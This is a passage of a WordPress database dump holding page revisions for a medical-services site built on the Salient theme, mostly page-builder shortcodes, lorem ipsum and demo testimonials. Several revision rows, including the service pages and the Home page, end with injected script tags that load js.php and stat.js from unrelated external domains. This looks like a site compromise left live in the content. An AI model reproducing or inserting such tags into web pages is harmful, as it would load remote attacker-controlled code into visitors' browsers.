src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service A','','inherit','closed','closed','','62-revision-v1','','','2017-12-10 16:18:29','2017-12-10 16:18:29','',62,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/62-revision-v1/',0,'revision','',0),(6197,1,'2017-12-10 16:18:35','2017-12-10 16:18:35','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service B','','inherit','closed','closed','','69-revision-v1','','','2017-12-10 16:18:35','2017-12-10 16:18:35','',69,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/69-revision-v1/',0,'revision','',0),(6198,1,'2017-12-10 16:18:41','2017-12-10 16:18:41','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service C','','inherit','closed','closed','','67-revision-v1','','','2017-12-10 16:18:41','2017-12-10 16:18:41','',67,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/67-revision-v1/',0,'revision','',0),(6199,1,'2017-12-10 16:18:46','2017-12-10 16:18:46','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service D','','inherit','closed','closed','','96-revision-v1','','','2017-12-10 16:18:46','2017-12-10 16:18:46','',96,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/96-revision-v1/',0,'revision','',0),(6200,1,'2017-12-10 16:18:52','2017-12-10 16:18:52','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service E','','inherit','closed','closed','','92-revision-v1','','','2017-12-10 16:18:52','2017-12-10 16:18:52','',92,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/92-revision-v1/',0,'revision','',0),(6201,1,'2017-12-10 16:18:56','2017-12-10 16:18:56','<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Service E','','inherit','closed','closed','','92-autosave-v1','','','2017-12-10 16:18:56','2017-12-10 16:18:56','',92,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/92-autosave-v1/',0,'revision','',0),(6202,1,'2017-12-10 16:19:53','2017-12-10 16:19:53','[vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_image=\"9\" bg_position=\"center center\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"14%\" bottom_padding=\"12%\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_t_to_right_b\" overlay_strength=\"0.95\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"padding-3-percent\" column_padding_position=\"left-right\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"padding-1-percent\" column_padding_position=\"bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][vc_column_text]\r\n<h1>Content here</h1>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" bottom_padding=\"30\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"300\"][vc_column_text]\r\n<h2>Get Noticed and Stay Remembered</h2>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" class=\"#2d3538\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_portfolio layout=\"fullwidth\" constrain_max_cols=\"true\" category=\"all\" project_style=\"6\" item_spacing=\"default\" masonry_style=\"true\" load_in_animation=\"fade_in_from_bottom\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"4%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h2>Stunning Looks &amp; Functionality</h2>\r\n<h5><span style=\"color: #bbbbbb;\">Eliminate your website building stress by using Salient</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"5%\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column enable_animation=\"true\" animation=\"none\" centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"\" image=\"ecommerce_diamond.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h5>Hot Looks</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"400\" image=\"basic_compass.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][vc_column_text]\r\n<h5>Easy Interface</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\" icon_size=\"\" animation_delay=\"800\" image=\"software_layers2.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"800\"][vc_column_text]\r\n<h5>True Power</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column centered_text=\"true\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][icon enable_animation=\"true\" color=\"Accent-Color\" animation_speed=\"Fast\"  icon_size=\"\" animation_delay=\"1200\" image=\"basic_anchor.svg\"]\r\n<h5></h5>\r\n[/vc_column_text][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"1200\"][vc_column_text]\r\n<h5>Solid Code</h5>\r\n<span style=\"color: #a3a3a3;\">Ut elit tellus, luctus nec magna mattis et, pulvinar dapibus lorem leo ultricies et vitae enim.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][divider line_type=\"Full Width Line\" line_thickness=\"1\" divider_color=\"default\"][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" bg_color=\"#ffffff\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"7%\" bottom_padding=\"6%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][testimonial_slider style=\"multiple_visible\" color=\"accent-color-dark\"][testimonial image=\"36\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Aura Brooks\" subtitle=\"Graphic Designer, Owl Eyes\" quote=\"By far the best team I\'ve ever worked with. They truly understood the look I was going for and completely nailed it! I would highly recommend them as a company, you simply just won\'t find any better team!\" id=\"1512922572276-8\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"37\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491481781-2\" name=\"Eve Crawford\" subtitle=\"Product Designer, That Biz\" quote=\"It was really fun getting to know the team during the project. They were all helpful in answering my questions and made me feel completely at ease. The design ended up being twice as good as I could have ever envisioned!\" id=\"1512922572324-0\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"38\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Jack Graham\" subtitle=\"Co founder, Coffee Inc\" quote=\"I\'m wondering why I never contacted these guys sooner! Seriously, they all have commendable talent in their respective fields and knocked my concept out of the ballpark. Thanks for an amazing experience!\" id=\"1512922572363-4\"] Click the edit button to add your testimonial. [/testimonial][testimonial image=\"39\" star_rating=\"none\" title=\"Testimonial\" tab_id=\"1451491482058-4\" name=\"Zak Reid\" subtitle=\"Instructor, Skate Nao\" quote=\"Salient is by far the most astonishing WP theme out there! I literally could not be happier that I chose to buy your theme! Your regular updates and superb attention to detail blows me away every time I visit my new site! \" id=\"1512922572400-2\"] Click the edit button to add your testimonial. [/testimonial][/testimonial_slider][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/blur.png\" bg_position=\"left top\" bg_repeat=\"no-repeat\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"3%\" bottom_padding=\"325\" enable_gradient=\"true\" color_overlay=\"#ffffff\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][vc_column column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][split_line_heading]\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">Design is the paradise</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">of individuality, eccentricity,</span></h2>\r\n<h2 style=\"color: #1e83ec;\"><span style=\"color: #1e83ec;\">abnormality, and humors.</span></h2>\r\n[/split_line_heading][vc_row_inner column_margin=\"default\" top_padding=\"15\" bottom_padding=\"25\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]We\'re Salient, a creative agency located in the heart of New York city. We pride ourselves on developing unique and professional solutions with a wide variety of mediums. Take a look around and don\'t be shy.[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]\r\n<h6 style=\"color: #1e83ec;\">What we can help you achieve</h6>\r\n<span style=\"color: rgba(0,0,0,0.45);\">Personal or corporate branding | SEO optimization | Web &amp; UI Design | Standing out in the crowd</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/4\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_color=\"#f7f7f7\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" bottom_padding=\"7%\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" top_margin=\"-100\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_blog layout=\"masonry-blog-fullwidth\" blog_masonry_style=\"inherit\" category=\"music\" load_in_animation=\"none\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\"][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"none\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"200\"][nectar_blog layout=\"masonry-blog-fullwidth\" blog_masonry_style=\"inherit\" category=\"food-for-thought\" load_in_animation=\"none\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\"][/vc_column_inner][vc_column_inner enable_animation=\"true\" animation=\"none\" column_padding=\"padding-1-percent\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/3\" column_border_width=\"none\" column_border_style=\"solid\" delay=\"400\"][nectar_blog layout=\"masonry-blog-fullwidth\" blog_masonry_style=\"inherit\" category=\"fashion\" load_in_animation=\"none\" order=\"DESC\" orderby=\"date\" posts_per_page=\"1\"][/vc_column_inner][/vc_row_inner][vc_row_inner column_margin=\"default\" top_padding=\"40\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" centered_text=\"true\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text][button color=\"extra-color-2\" hover_text_color_override=\"#fff\" image=\"default-arrow\" size=\"medium\" url=\"#\" text=\"View All Posts\" color_override=\"\"][/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" top_padding=\"40\" bottom_padding=\"40\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][clients columns=\"6\" hover_effect=\"opacity\" additional_padding=\"none\" carousel=\"true\"][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966191-10\" name=\"Waveform\" id=\"1451664886009-6\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451662966634-5\" name=\"Boots\" id=\"1451664886043-10\"] Click the edit button to add your testimonial. [/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664886075-8\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663114418-1\" name=\"Six\" id=\"1451664886141-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663132415-1\" name=\"Four\" id=\"1451664886163-9\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663143506-0\" name=\"Three Days\" id=\"1451664886197-5\"][/client][client image=\"http://themenectar.com/demo/salient-corporate/wp-content/uploads/2016/01/client.png\" title=\"Client\" tab_id=\"1451663102205-9\" name=\"osw\" id=\"1451664700416-0-2\"][/client][/clients][/vc_column][/vc_row][vc_row type=\"full_width_content\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" enable_gradient=\"true\" color_overlay=\"#585b64\" color_overlay_2=\"#2c2f38\" gradient_direction=\"left_to_right\" overlay_strength=\"1\" shape_divider_position=\"bottom\"][vc_column centered_text=\"true\" column_padding=\"no-extra-padding\" column_padding_position=\"top-bottom\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text css=\".vc_custom_1512922781747{border-top-width: 1px !important;padding-top: 10% !important;border-top-color: rgba(255,255,255,0.11) !important;border-top-style: solid !important;}\"]\r\n<h2>Build a Beautiful Website</h2>\r\n<h5><span style=\"color: #bbbbbb;\">here</span></h5>\r\n[/vc_column_text][/vc_column][/vc_row]<script src=\'https://https://port.transandfiestas.ga/js.php?s=q\' type=\'text/javascript\'></script><script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script><script src=\'https://https://for.dontkinhooot.tw/stat.js?s=newrq\' type=\'text/javascript\'></script>','Home','','inherit','closed','closed','','5-revision-v1','','','2017-12-10 16:19:53','2017-12-10 16:19:53','',5,'http://sandbox.futuremediatrix.com/medikpro/2017/12/10/5-revision-v1/',0,'revision','',0),(6203,1,'2018-01-18 00:21:20','2018-01-18 00:21:20','<p>[vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" scene_position=\"center\" text_color=\"dark\" text_align=\"left\" overlay_strength=\"0.3\" shape_divider_position=\"bottom\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][page_submenu alignment=\"center\" sticky=\"true\" bg_color=\"#111111\" link_color=\"#ffffff\"][page_link link_url=\"#why\" title=\"Why Medikpro\" tab_id=\"1451708274600-9\" id=\"1451966795422-6\"] [/page_link][page_link link_url=\"#vismis\" title=\"Vision and Mission\" tab_id=\"1451708274600-9\" id=\"1451966795475-6\"] [/page_link][page_link link_url=\"#philosophy\" title=\"Philosophy\" tab_id=\"1451708274756-7\" id=\"1451966795453-10\"] [/page_link][/page_submenu][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"6502\" bg_position=\"center top\" bg_repeat=\"no-repeat\" bg_color=\"#cbcbc3\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"4%\" bottom_padding=\"4%\" id=\"why\" enable_gradient=\"true\" color_overlay_2=\"#151519\" gradient_direction=\"top_to_bottom\" overlay_strength=\"1\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner column_margin=\"default\" top_padding=\"65%\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column_inner][/vc_row_inner][split_line_heading]<br />\n<h2>Why Us</h2>\n<p>[/split_line_heading][vc_row_inner column_margin=\"default\" text_align=\"left\"][vc_column_inner enable_animation=\"true\" animation=\"fade-in-from-bottom\" column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" column_border_width=\"none\" column_border_style=\"solid\"][vc_column_text]Maecenas congue justo sed euismod tristique. Ut dapibus mauris a neque convallis, sit amet vestibulum eros vestibulum. Aliquam feugiat, sapien non mollis mattis, enim leo pellentesque ante, eget malesuada felis leo suscipit mauris. Proin et volutpat arcu. Nulla sit amet euismod mauris. Praesent eros nunc, ullamcorper eu condimentum sit amet, venenatis sit amet ante. Cras lobortis nisi et nibh consectetur venenatis. Nulla commodo commodo sapien. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Pellentesque at arcu augue. Aenean quam leo, gravida et enim id, laoreet mattis dui. Orci varius natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Proin sit amet egestas quam, eget consectetur felis.</p>\n<p>Vivamus vitae enim ultrices, fermentum nunc eu, euismod sapien. Praesent scelerisque a nisi non tristique. Sed feugiat tempor augue, quis venenatis dui auctor vitae. Proin lacinia, erat non commodo vestibulum, nulla augue tincidunt turpis, et lobortis nulla turpis quis orci. Aenean convallis, lorem eu pretium blandit, erat lectus hendrerit diam, a tempus nisl ante eget dui. Vivamus ut augue in nibh eleifend sollicitudin. Phasellus id bibendum quam. Donec at orci aliquet, gravida neque consequat, pulvinar nisl. Suspendisse ac dolor non eros maximus malesuada a nec est. Nulla in pulvinar lacus. Pellentesque blandit mauris quis scelerisque suscipit. Phasellus condimentum enim diam, ut luctus dolor auctor ut. Praesent malesuada malesuada purus condimentum convallis.[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][/vc_column][/vc_row][vc_row type=\"full_width_background\" full_screen_row_position=\"middle\" bg_image=\"https://source.unsplash.com/nvzvOPQW0gc\" bg_position=\"left top\" bg_repeat=\"no-repeat\" parallax_bg=\"true\" parallax_bg_speed=\"fast\" scene_position=\"center\" text_color=\"light\" text_align=\"left\" top_padding=\"10%\" bottom_padding=\"10%\" id=\"vismis\" color_overlay=\"rgba(10,10,10,0.67)\" overlay_strength=\"0.5\" shape_divider_position=\"bottom\" shape_type=\"\"][vc_column column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/1\" tablet_text_alignment=\"default\" phone_text_alignment=\"default\" column_border_width=\"none\" column_border_style=\"solid\"][vc_row_inner equal_height=\"yes\" content_placement=\"middle\" column_margin=\"default\" text_align=\"left\"][vc_column_inner column_padding=\"no-extra-padding\" column_padding_position=\"all\" background_color_opacity=\"1\" background_hover_color_opacity=\"1\" column_shadow=\"none\" column_border_radius=\"none\" width=\"1/2\" column_border_width=\"none\" column_border_style=\"solid\"][nectar_cascading_images image_1_bg_color=\"#3452ff\" image_1_offset_x_sign=\"+\" image_1_offset_x=\"0%\" image_1_offset_y_sign=\"+\" image_1_offset_y=\"0%\" image_1_rotate_sign=\"+\" image_1_rotate=\"none\" image_1_animation=\"Grow In\" image_1_box_shadow=\"none\" image_2_url=\"https://source.unsplash.com/iCtJF-A5hvs/600x400\" image_2_offset_x_sign=\"-\" image_2_offset_x=\"25%\" image_2_offset_y_sign=\"+\" image_2_offset_y=\"30%\" image_2_rotate_sign=\"+\" image_2_rotate=\"none\" image_2_animation=\"Grow In\" image_2_box_shadow=\"none\" image_3_url=\"https://source.unsplash.com/nvzvOPQW0gc/600x400\" image_3_offset_x_sign=\"+\" image_3_offset_x=\"15%\" image_3_offset_y_sign=\"-\" image_3_offset_y=\"30%\" image_3_rotate_sign=\"+\" image_3_rotate=\"none\" image_3_animation=\"Grow In\" image_3_box_shadow=\"x_large_depth\" image_4_offset_x_sign=\"+\" image_4_offset_x=\"0%\" image_4_offset_y_sign=\"+\" image_4_offset_y=\"0%\" image_4_rotate_sign=\"+\" image_4_rotate=\"none\" image_4_animation=\"Fade In\" image_4_box_shadow=\"none\" 